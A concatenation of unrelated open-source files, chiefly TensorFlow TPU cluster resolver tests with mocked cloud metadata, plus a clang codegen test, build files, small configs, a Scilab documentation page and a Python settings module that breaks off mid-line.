compat mock = test.mock try: from cloud_tpu_client import client # pylint: disable=g-import-not-at-top except ImportError: logging.debug( 'Falling back to TensorFlow client; we recommended you install the Cloud ' 'TPU client directly with pip install cloud-tpu-client.') from tensorflow.python.tpu.client import client # pylint: disable=g-import-not-at-top class MockRequestClass(object): def __init__(self, name, tpu_map): self._name = name self._tpu_map = tpu_map def execute(self): if self._name in self._tpu_map: return self._tpu_map[self._name] else: raise KeyError('Resource %s was not found' % self._name) class MockNodeClass(object): def __init__(self, tpu_map): self._tpu_map = tpu_map def get(self, name): return MockRequestClass(name, self._tpu_map) def mock_request_compute_metadata(*args, **kwargs): del kwargs # Unused. if args[0] == 'project/project-id': return 'test-project' elif args[0] == 'instance/zone': return 'projects/test-project/locations/us-central1-c' elif args[0] == 'instance/network-interfaces/0/ip': return '10.128.1.2' return '' def mock_is_running_in_gce(): return True def mock_is_not_running_in_gce(): return False def mock_running_in_gce_urlopen(cls, *args, **kwargs): del cls, args, kwargs # Unused. mock_response = mock.MagicMock() mock_response.info.return_value = {'Metadata-Flavor': 'Google'} return mock_response def mock_not_running_in_gce_urlopen(cls, *args, **kwargs): del cls, args, kwargs # Unused. raise URLError(reason='Host does not exist.') @test_util.run_all_in_graph_and_eager_modes class TPUClusterResolverTest(test.TestCase): def _verifyClusterSpecEquality(self, cluster_spec, expected_proto): """Verifies that the ClusterSpec generates the correct proto. We are testing this four different ways to ensure that the ClusterSpec returned by the TPUClusterResolver behaves identically to a normal ClusterSpec when passed into the generic ClusterSpec libraries. Args: cluster_spec: ClusterSpec returned by the TPUClusterResolver expected_proto: Expected protobuf """ self.assertProtoEquals(expected_proto, cluster_spec.as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec).as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec.as_cluster_def()).as_cluster_def()) self.assertProtoEquals( expected_proto, server_lib.ClusterSpec(cluster_spec.as_dict()).as_cluster_def()) def mock_service_client(self, tpu_map=None): if tpu_map is None: tpu_map = {} mock_locations = mock.MagicMock() mock_locations.nodes.return_value = MockNodeClass(tpu_map) mock_project = mock.MagicMock() mock_project.locations.return_value = mock_locations mock_client = mock.MagicMock() mock_client.projects.return_value = mock_project return mock_client @mock.patch.object(resolver, 'is_running_in_gce', mock_is_running_in_gce) def testCheckRunningInGceWithNoTpuName(self): with self.assertRaisesRegex(ValueError, 'Please provide a TPU Name to connect to.*'): resolver.TPUClusterResolver(tpu='') @mock.patch.object(six.moves.urllib.request, 'urlopen', mock_running_in_gce_urlopen) def testIsRunningInGce(self): self.assertTrue(resolver.is_running_in_gce()) @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testRetrieveProjectAndZoneFromMetadata(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu=['test-tpu-1'], credentials=None, service=self.mock_service_client(tpu_map=tpu_map), coordinator_name='coordinator') actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' tasks { key: 0 value: '10.128.1.2:%s' } } job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ % cluster_resolver._coordinator_port self._verifyClusterSpecEquality(actual_cluster_spec, str(expected_proto)) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testRetrieveProjectAndZoneFromMetadataNoCoordinator(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu=['test-tpu-1'], coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testNotReadyCloudTpu(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'CREATING' } } cluster_resolver = resolver.TPUClusterResolver( project=None, zone=None, tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) with self.assertRaises(RuntimeError): cluster_resolver.cluster_spec() def testSimpleSuccessfulRetrieval(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'state': 'READY', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=['test-tpu-1'], coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' tasks { key: 0 value: '10.128.1.5:10203' } } job { name: 'worker' tasks { key: 0 value: '10.1.2.3:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') def testFailedMetadata(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'ipAddress': '10.1.2.3', 'port': '8470', 'health': 'HEALTHY' } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='nonexistent-tpu', coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) with self.assertRaises(ValueError) as context: cluster_resolver.cluster_spec() self.assertIn('Could not lookup TPU metadata', str(context.exception)) def testNewNetworkEndpointFormat(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [{ 'ipAddress': '10.2.3.4', 'port': 8470, }] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name='coordinator', coordinator_address='10.128.1.5:10203', credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator' tasks { key: 0 value: '10.128.1.5:10203' } } job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual('grpc://10.2.3.4:8470', cluster_resolver.master()) @mock.patch.object(client, '_request_compute_metadata', mock_request_compute_metadata) def testPodResolution(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( tpu='test-tpu-1', credentials=None, service=self.mock_service_client(tpu_map=tpu_map), coordinator_name='coordinator') actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'coordinator', tasks { key: 0 value: '10.128.1.2:%s'} } job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } tasks { key: 1 value: '10.2.3.5:8470' } tasks { key: 2 value: '10.2.3.6:8470' } tasks { key: 3 value: '10.2.3.7:8470' } } """ % cluster_resolver._coordinator_port self._verifyClusterSpecEquality(actual_cluster_spec, str(expected_proto)) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') def testPodResolutionNoCoordinator(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.2.3.4:8470' } tasks { key: 1 value: '10.2.3.5:8470' } tasks { key: 2 value: '10.2.3.6:8470' } tasks { key: 3 value: '10.2.3.7:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') def testGetMasterNoEntries(self): tpu_map = {} with self.assertRaises(ValueError): resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=[], coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) # TODO(saeta): Convert to parameterized test when included in OSS TF. def verifyShouldResolve(self, tpu, should_resolve): cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu=tpu, coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map={})) self.assertEqual(should_resolve, cluster_resolver._cloud_tpu_client.api_available(), "TPU: '%s'" % tpu) def testShouldResolveGrpc(self): self.verifyShouldResolve('grpc://10.1.2.3:8470', False) def testShouldResolveName(self): self.verifyShouldResolve('mytpu', True) def testShouldResolveList(self): self.verifyShouldResolve(['myothertpu'], True) def testShouldResolveGrpcPrefix(self): self.verifyShouldResolve('grpctpu', True) def testNoCallComputeMetadata(self): cluster_resolver = resolver.TPUClusterResolver(tpu='grpc://10.1.2.3:8470') self.assertEqual('grpc://10.1.2.3:8470', cluster_resolver.master()) self.assertEqual( server_lib.ClusterSpec({ 'worker': ['10.1.2.3:8470'] }).as_dict(), cluster_resolver.cluster_spec().as_dict()) def testGkeEnvironmentForDonut(self): os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] = 'grpc://10.120.27.5:8470' self.assertIn('KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS', os.environ) cluster_resolver = resolver.TPUClusterResolver() self.assertEqual( compat.as_bytes('grpc://10.120.27.5:8470'), compat.as_bytes(cluster_resolver.master())) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.120.27.5:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) del os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] def testGkeEnvironmentForPod(self): os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] = ('grpc://10.120.27.5:8470,' 'grpc://10.120.27.6:8470,' 'grpc://10.120.27.7:8470,' 'grpc://10.120.27.8:8470') self.assertIn('KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS', os.environ) cluster_resolver = resolver.TPUClusterResolver() self.assertEqual( compat.as_bytes('grpc://10.120.27.5:8470'), compat.as_bytes(cluster_resolver.master())) actual_cluster_spec = cluster_resolver.cluster_spec() expected_proto = """ job { name: 'worker' tasks { key: 0 value: '10.120.27.5:8470' } tasks { key: 1 value: '10.120.27.6:8470' } tasks { key: 2 value: '10.120.27.7:8470' } tasks { key: 3 value: '10.120.27.8:8470' } } """ self._verifyClusterSpecEquality(actual_cluster_spec, expected_proto) del os.environ['KUBE_GOOGLE_CLOUD_TPU_ENDPOINTS'] def testRpcDetectionForGrpcString(self): cluster_resolver = resolver.TPUClusterResolver( tpu='grpc://10.1.2.3:8470') self.assertEqual(cluster_resolver.master(), 'grpc://10.1.2.3:8470') def testOverrideTaskTypeAndIndexAndGetMaster(self): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', coordinator_name=None, credentials=None, service=self.mock_service_client(tpu_map=tpu_map)) self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.4:8470') cluster_resolver.task_type = 'worker' cluster_resolver.task_id = 3 self.assertEqual(cluster_resolver.master(), 'grpc://10.2.3.7:8470') def testGetDeviceDictAndCoresWithTPUs(self): devices = [ '/job:tpu_worker/task:0/device:TPU:0', '/job:tpu_worker/task:1/device:TPU:1', '/job:tpu_worker/task:2/device:TPU:0', '/job:tpu_worker/task:3/device:TPU:1', '/job:tpu_worker/task:0/device:TPU:4', '/job:tpu_worker/task:1/device:TPU:5', '/job:tpu_worker/task:2/device:TPU:4', '/job:tpu_worker/task:3/device:TPU:5', ] device_list = [ session._DeviceAttributes(name, 'TPU', 1024, 0) for name in devices ] device_details = resolver.TPUClusterResolver._get_device_dict_and_cores( device_list) self.assertEqual(device_details.total_cores, 8) self.assertEqual(device_details.device_map, {'0': ['0', '4'], '1': ['1', '5'], '2': ['0', '4'], '3': ['1', '5']}) def testGetDeviceDictAndCoresWithCPUsAndGPUs(self): devices = [ '/job:tpu_worker/task:0/device:CPU:0', '/job:tpu_worker/task:1/device:CPU:0', '/job:tpu_worker/task:2/device:CPU:0', '/job:tpu_worker/task:3/device:CPU:0', '/job:tpu_worker/task:0/device:GPU:1', '/job:tpu_worker/task:1/device:GPU:1', '/job:tpu_worker/task:2/device:GPU:1', '/job:tpu_worker/task:3/device:GPU:1', ] device_list = [ session._DeviceAttributes(name, 'XLA', 1024, 0) for name in devices ] device_dict, num_cores =\ resolver.TPUClusterResolver._get_device_dict_and_cores(device_list) self.assertEqual(num_cores, 0) self.assertEqual(device_dict, {}) def testVerifySameCoreCount(self): self.assertEqual( resolver.TPUClusterResolver ._verify_and_return_same_core_count({0: [0, 1, 2, 3, 4, 5, 6, 7]}), 8) self.assertEqual( resolver.TPUClusterResolver ._verify_and_return_same_core_count({ 0: [0, 1], 1: [2, 3] }), 2) with self.assertRaises(RuntimeError): resolver.TPUClusterResolver._verify_and_return_same_core_count( { 0: [0], 1: [1, 2] }) @mock.patch.object(framework.config, 'list_logical_devices') @mock.patch.object(session.BaseSession, 'list_devices') @mock.patch.object(resolver, 'is_running_in_gce', mock_is_not_running_in_gce) def testNumAcceleratorsSuccess(self, mock_list_devices, mock_eager_list_devices): devices = [ LogicalDevice('/job:tpu_worker/task:0/device:TPU:0', 'TPU'), LogicalDevice('/job:tpu_worker/task:1/device:TPU:1', 'TPU'), LogicalDevice('/job:tpu_worker/task:2/device:TPU:0', 'TPU'), LogicalDevice('/job:tpu_worker/task:3/device:TPU:1', 'TPU'), LogicalDevice('/job:tpu_worker/task:0/device:TPU:4', 'TPU'), LogicalDevice('/job:tpu_worker/task:1/device:TPU:5', 'TPU'), LogicalDevice('/job:tpu_worker/task:2/device:TPU:4', 'TPU'), LogicalDevice('/job:tpu_worker/task:3/device:TPU:5', 'TPU'), ] device_list = [ session._DeviceAttributes(d.name, d.device_type, 1024, 0) for d in devices ] mock_eager_list_devices.return_value = devices mock_list_devices.return_value = device_list tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'state': 'READY', 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', service=self.mock_service_client(tpu_map=tpu_map)) self.assertEqual(cluster_resolver.num_accelerators(), {'TPU': 2}) @mock.patch.object(framework.config, 'list_logical_devices') @mock.patch.object(session.BaseSession, 'list_devices') @mock.patch.object(resolver, 'is_running_in_gce', mock_is_not_running_in_gce) def testNumAcceleratorsRetryFailure(self, mock_list_devices, mock_eager_list_devices): tpu_map = { 'projects/test-project/locations/us-central1-c/nodes/test-tpu-1': { 'health': 'HEALTHY', 'networkEndpoints': [ { 'ipAddress': '10.2.3.4', 'port': 8470, }, { 'ipAddress': '10.2.3.5', 'port': 8470, }, { 'ipAddress': '10.2.3.6', 'port': 8470, }, { 'ipAddress': '10.2.3.7', 'port': 8470, }, ] } } cluster_resolver = resolver.TPUClusterResolver( project='test-project', zone='us-central1-c', tpu='test-tpu-1', service=self.mock_service_client(tpu_map=tpu_map)) mock_list_devices.side_effect = errors.DeadlineExceededError( None, None, 'timeout') mock_eager_list_devices.side_effect = errors.DeadlineExceededError( None, None, 'timeout') with self.assertRaises(RuntimeError): cluster_resolver.num_accelerators() def testLocalTpuResolver(self): cr = resolver.TPUClusterResolver(tpu='local') self.assertEqual(cr.get_master(), '') if __name__ == '__main__': test.main()
{ "pile_set_name": "Github" }
// RUN: %clang_cc1 -triple x86_64-apple-darwin -std=c++11 -emit-llvm %s -o - | FileCheck %s struct A { A(const A&); A(); ~A(); }; struct B : public A { B(); B(const B& Other); ~B(); }; struct C : public B { C(); C(const C& Other); ~C(); }; struct X { operator B&(); operator C&(); X(const X&); X(); ~X(); B b; C c; }; void test0_helper(A); void test0(X x) { test0_helper(x); // CHECK-LABEL: define void @_Z5test01X( // CHECK: [[TMP:%.*]] = alloca [[A:%.*]], align // CHECK-NEXT: [[T0:%.*]] = call dereferenceable({{[0-9]+}}) [[B:%.*]]* @_ZN1XcvR1BEv( // CHECK-NEXT: [[T1:%.*]] = bitcast [[B]]* [[T0]] to [[A]]* // CHECK-NEXT: call void @_ZN1AC1ERKS_([[A]]* [[TMP]], [[A]]* dereferenceable({{[0-9]+}}) [[T1]]) // CHECK-NEXT: call void @_Z12test0_helper1A([[A]]* [[TMP]]) // CHECK-NEXT: call void @_ZN1AD1Ev([[A]]* [[TMP]]) // CHECK-NEXT: ret void } struct Base; struct Root { operator Base&(); }; struct Derived; struct Base : Root { Base(const Base &); Base(); operator Derived &(); }; struct Derived : Base { }; void test1_helper(Base); void test1(Derived bb) { // CHECK-LABEL: define void @_Z5test17Derived( // CHECK-NOT: call {{.*}} @_ZN4BasecvR7DerivedEv( // CHECK: call void @_ZN4BaseC1ERKS_( // CHECK-NOT: call {{.*}} @_ZN4BasecvR7DerivedEv( // CHECK: call void @_Z12test1_helper4Base( test1_helper(bb); } // Don't crash after devirtualizing a derived-to-base conversion // to an empty base allocated at offset zero. // rdar://problem/11993704 class Test2a {}; class Test2b final : public virtual Test2a {}; void test2(Test2b &x) { Test2a &y = x; // CHECK-LABEL: define void @_Z5test2R6Test2b( // CHECK: [[X:%.*]] = alloca [[B:%.*]]*, align 8 // CHECK-NEXT: [[Y:%.*]] = alloca [[A:%.*]]*, align 8 // CHECK-NEXT: store [[B]]* {{%.*}}, [[B]]** [[X]], align 8 // CHECK-NEXT: [[T0:%.*]] = load [[B]]*, [[B]]** [[X]], align 8 // CHECK-NEXT: [[T1:%.*]] = bitcast [[B]]* [[T0]] to [[A]]* // CHECK-NEXT: store [[A]]* [[T1]], [[A]]** [[Y]], align 8 // CHECK-NEXT: ret void }
{ "pile_set_name": "Github" }
prgbindir=$(prefix)/samples/bin prgbin_PROGRAMS = notify notify_SOURCES = notify.cpp notify_LDADD = $(LDFLAGS) \ ../../../wsf_c/axis2c/util/src/libaxutil.la \ ../../../wsf_c/axis2c/axiom/src/om/libaxis2_axiom.la \ ../../../wsf_c/axis2c/src/core/engine/libaxis2_engine.la \ ../../../wsf_c/axis2c/axiom/src/parser/guththila/libaxis2_parser.la \ ../../../wsf_c/axis2c/src/core/transport/http/sender/libaxis2_http_sender.la \ ../../../wsf_c/axis2c/src/core/transport/http/receiver/libaxis2_http_receiver.la \ ../../../src/main/libwso2_wsf.la \ $(GUTHTHILA_LIBS) \ $(LIBXML2_LIBS) INCLUDES = -I../../../include \ -I ../../../wsf_c/axis2c/include \ -I ../../../wsf_c/axis2c/neethi/include \ -I ../../../wsf_c/axis2c/axiom/include \ -I ../../../wsf_c/axis2c/util/include \ -I ../../../wsf_c/axis2c/util/include/platforms \ -I ../../../wsf_c/rampartc/include \ -I ../../../wsf_c/sandesha2c/include \ -I ../../../wsf_c/savanc/include
{ "pile_set_name": "Github" }
/* * * * Copyright 1990-2009 Sun Microsystems, Inc. All Rights Reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License version * 2 only, as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License version 2 for more details (a copy is * included at /legal/license.txt). * * You should have received a copy of the GNU General Public License * version 2 along with this work; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA * 02110-1301 USA * * Please contact Sun Microsystems, Inc., 4150 Network Circle, Santa * Clara, CA 95054 or visit www.sun.com if you need additional * information or have any questions. */ package javax.microedition.content; /** * A <code>RequestListener</code> interface to be notified when an * Invocation request is available. A listener is set with * {@link ContentHandlerServer#setListener ContentHandlerServer.setListener}. */ public interface RequestListener { /** * The listener is notified to indicate that an new Invocation * request is available. * @param handler the ContentHandlerServer with a new request */ void invocationRequestNotify(ContentHandlerServer handler); }
{ "pile_set_name": "Github" }
(*s: ui_layers.ml *) (*s: Facebook copyright *) (* Yoann Padioleau * * Copyright (C) 2010-2012 Facebook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public License * version 2.1 as published by the Free Software Foundation, with the * special exception on linking described in file license.txt. * * This library is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the file * license.txt for more details. *) (*e: Facebook copyright *) open Common open Model2 module M = Model2 module Controller = Controller2 module L = Layer_code (*****************************************************************************) (* Prelude *) (*****************************************************************************) let choose_layer ~root layer_title_opt w = pr2 "choose_layer()"; let dw = w.dw in let original_layers = dw.M.layers.L.layers +> List.map fst in let layers_idx = Layer_code.build_index_of_layers ~root (original_layers +> List.map (fun layer -> layer, match layer_title_opt with | None -> false | Some title -> title =$= layer.L.title )) in w.dw <- Model2.init_drawing ~width:dw.width ~height:dw.height w.treemap_func layers_idx [root] root; View_mainmap.paint w.dw w.model; !Controller._refresh_da (); !Controller._refresh_legend (); () (*e: ui_layers.ml *)
{ "pile_set_name": "Github" }
Makefile: Don't call "ln" directly Signed-off-by: Vicente Olivert Riera <[email protected]> --- keyutils-1.5.9/Makefile.orig 2014-09-22 16:05:14.117007430 +0100 +++ keyutils-1.5.9/Makefile 2014-09-22 16:06:26.053219336 +0100 @@ -123,10 +123,10 @@ endif ifeq ($(NO_SOLIB),0) all: $(DEVELLIB) $(DEVELLIB): $(SONAME) - ln -sf $< $@ + $(LNS) $< $@ $(SONAME): $(LIBNAME) - ln -sf $< $@ + $(LNS) $< $@ LIBVERS := -shared -Wl,-soname,$(SONAME) -Wl,--version-script,version.lds
{ "pile_set_name": "Github" }
{ "name": "autotest", "version": "1.0.0" }
{ "pile_set_name": "Github" }
server{ listen 8080; location / { return 200 "Welcome to this authenticated web service.\n"; } }
{ "pile_set_name": "Github" }
foo { key = 7 } foo { foo = "bar" }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <refentry xmlns="http://docbook.org/ns/docbook" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:svg="http://www.w3.org/2000/svg" xmlns:mml="http://www.w3.org/1998/Math/MathML" xmlns:db="http://docbook.org/ns/docbook" xmlns:scilab="http://www.scilab.org" xml:lang="ja" xml:id="ell1mag"> <refnamediv> <refname>ell1mag</refname> <refpurpose>楕円フィルタの振幅</refpurpose> </refnamediv> <refsynopsisdiv> <title>呼び出し手順</title> <synopsis>[v]=ell1mag(eps,m1,z)</synopsis> </refsynopsisdiv> <refsection> <title>引数</title> <variablelist> <varlistentry> <term>eps</term> <listitem> <para> 通過域のリップル=<literal>1/(1+eps^2)</literal> </para> </listitem> </varlistentry> <varlistentry> <term>m1</term> <listitem> <para> 阻止域のリップル=<literal>1/(1+(eps^2)/m1)</literal> </para> </listitem> </varlistentry> <varlistentry> <term>z</term> <listitem> <para>複素平面上の標本ベクトルの値</para> </listitem> </varlistentry> <varlistentry> <term>v</term> <listitem> <para>標本点における楕円フィルタの値</para> </listitem> </varlistentry> </variablelist> </refsection> <refsection> <title>説明</title> <para> 楕円フィルタの二乗振幅を得る際に使用される関数. 通常は,<literal>m1=eps*eps/(a*a-1)</literal>です. <literal>s=ellipj(z,m1)</literal>として, <literal>v=real(ones(z)./(ones(z)+eps*eps*s.*s))</literal>を返します. </para> </refsection> <refsection> <title>例</title> <programlisting role="example"><![CDATA[ deff('[alpha,BeTa]=alpha_beta(n,m,m1)',... 'if 2*int(n/2)==n then, BeTa=K1; else, BeTa=0;end;'+... 'alpha=%k(1-m1)/%k(1-m);') epsilon=0.1;A=10; //リップルパラメータ m1=(epsilon*epsilon)/(A*A-1);n=5;omegac=6; m=find_freq(epsilon,A,n);omegar = omegac/sqrt(m) %k(1-m1)*%k(m)/(%k(m1)*%k(1-m))-n //チェック... [alpha,Beta]=alpha_beta(n,m,m1) alpha*delip(1,sqrt(m))-n*%k(m1) //チェック sample=0:0.01:20; //等高線に正の実軸をマップ... z=alpha*delip(sample/omegac,sqrt(m))+Beta*ones(sample); plot(sample,ell1mag(epsilon,m1,z)) ]]></programlisting> <scilab:image><![CDATA[ deff('[alpha,BeTa]=alpha_beta(n,m,m1)',... 'if 2*int(n/2)==n then, BeTa=K1; else, BeTa=0;end;'+... 'alpha=%k(1-m1)/%k(1-m);') epsilon=0.1;A=10; //ripple parameters m1=(epsilon*epsilon)/(A*A-1);n=5;omegac=6; m=find_freq(epsilon,A,n);omegar = omegac/sqrt(m) %k(1-m1)*%k(m)/(%k(m1)*%k(1-m))-n //Check... [alpha,Beta]=alpha_beta(n,m,m1) alpha*delip(1,sqrt(m))-n*%k(m1) //Check samples=0:0.01:20; //Now we map the positive real axis into the contour... z=alpha*delip(samples/omegac,sqrt(m))+Beta*ones(samples); plot(samples,ell1mag(epsilon,m1,z)) ]]> </scilab:image> </refsection> <refsection role="see also"> <title>参照</title> <simplelist type="inline"> <member> <link linkend="buttmag">buttmag</link> </member> </simplelist> </refsection> </refentry>
{ "pile_set_name": "Github" }
二便 18 19 身体部位 12 42牙齿 24 30 身体部位 松动 31 32 症状和体征 前臂 37 38 身体部位 红肿 45 46 症状和体征 口腔内黏膜 48 52 身体部位 12 42牙齿 56 62 身体部位 松动 63 64 症状和体征
{ "pile_set_name": "Github" }
/* * balde: A microframework for C based on GLib and bad intentions. * Copyright (C) 2013-2017 Rafael G. Martins <[email protected]> * * This program can be distributed under the terms of the LGPL-2 License. * See the file COPYING. */ #ifndef _BALDE_SAPI_SCGI_PRIVATE_H #define _BALDE_SAPI_SCGI_PRIVATE_H #include <glib.h> #include <gio/gio.h> #include "../balde.h" balde_request_env_t* balde_sapi_scgi_parse_request(balde_app_t *app, GInputStream *istream); #endif /* _BALDE_SAPI_SCGI_PRIVATE_H */
{ "pile_set_name": "Github" }
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT license. # add the project root to python path import os import sys sys.path.append(sys.path[0]) from enum import Enum import nltk version = '1.1.0' # Supported languages LanguageTypes = Enum('LanguageTypes', ('english', 'chinese')) # Supported problems ProblemTypes = Enum('ProblemTypes', ('sequence_tagging', 'classification', 'regression', 'mrc')) # Supported sequence tagging scheme TaggingSchemes = Enum('TaggingSchemes', ('BIO', 'BIOES')) # supported metrics SupportedMetrics = { ProblemTypes.sequence_tagging: set(['seq_tag_f1', 'seq_tag_accuracy']), ProblemTypes.classification: set(['auc', 'accuracy', 'f1', 'macro_f1', 'macro_precision', 'macro_recall', 'micro_f1', 'micro_precision', 'micro_recall', 'weighted_f1', 'weighted_precision', 'weighted_recall']), # In addition, for auc in multi-type classification, # if there is a type named 1, auc@1 means use 1 as the positive label # auc@average means enumerate all the types as the positive label and obtain the average auc. ProblemTypes.regression: set(['MSE', 'RMSE']), ProblemTypes.mrc: set(['f1', 'em']), } # Supported prediction types PredictionTypes = { ProblemTypes.sequence_tagging: set(['prediction']), ProblemTypes.classification: set(['prediction', 'confidence']), # In addition, if there is a type named positive, confidence@positive means the confidence of positive ProblemTypes.regression: set(['prediction']), ProblemTypes.mrc: set(['prediction']), } # Supported multi_loss operation LossOperationType = Enum('LossOperationType', ('weighted_sum')) # If prediction_field is not defined, use the default fields below DefaultPredictionFields = { ProblemTypes.sequence_tagging: ['prediction'], ProblemTypes.classification: ['prediction', 'confidence'], ProblemTypes.regression: ['prediction'], ProblemTypes.mrc: ['prediction'], } # nltk's models nltk.data.path.append(os.path.join(os.getcwd(), 'dataset', 'nltk_data')) class Constant(type): def __setattr__(self, name, value): raise AttributeError("Class %s can not be modified"%(self.__name__)) class ConstantStatic(metaclass=Constant): def __init__(self, *args,**kwargs): raise Exception("Class %s can not be instantiated"%(self.__class__.__name__)) class Setting(ConstantStatic): # cache ## cencoding (cache_encoding) cencodig_index_file_name = 'index.json' cencoding_index_md5_file_name = 'index_md5.json' cencoding_file_name_pattern = 'encoding_cache_%s.pkl' cencoding_key_finish = 'finish' cencoding_key_index = 'index' cencoding_key_legal_cnt = 